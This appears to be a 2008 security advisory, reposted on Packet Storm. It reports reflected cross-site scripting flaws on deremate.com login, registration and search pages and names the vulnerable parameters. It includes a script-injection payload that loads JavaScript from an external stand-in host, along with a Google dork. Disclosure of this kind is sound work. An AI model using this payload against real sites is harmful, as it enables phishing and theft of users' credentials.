Deremate's Shopping Online application is vulnerable to cross site scripting vulnerabilities.
3c4c2d54915206f7b7e3358f161dc074[ www.nullcode.com.ar ]
+==========================================================================+
+ Deremate.com security compromised with XSS/ RFI flaw +
+==========================================================================+
Author(s): Ivan Sanchez
Product:deremate.com
Web:http://www.deremate.com/
Versions,sites affected: Copyright © 1999-2006 DeRemate.com
Date: 24/08/2008
On Deremate Domain Sites Allows Phishing and others security compromised with XSS/ RFI/ flaw...
GOOGLE DORKS:
------------
"deremate.com"
Domains affected part I:
------------------------
http://afiliados.deremate.com.ar/login.asp
http://afiliados.deremate.com.ar/registro/registro-particular-t1.asp
http://afiliados.deremate.com.ar/registro/registro-empresa-t1.asp
(there are other links vulnerables)
Parameters affected:
--------------------
txtIDUsuario
txtContrasena
Evil code to input into parameter: "><script src=http://site/scripts/evil.js></script>
Domain affected part II:
-------------------------
http://www.deremate.com.ar/cafe/runSearch.asp
(there are other links vulnerables)
Parameters affected:
--------------------
toSearch
Evil code to input into parameter: "><script src=http://site/scripts/evil.js></script>
Remediation: review and then sanitized all internal code.
------------
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ Deremate security compromised with XSS/ RFI flaw +
+==========================================================================+
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!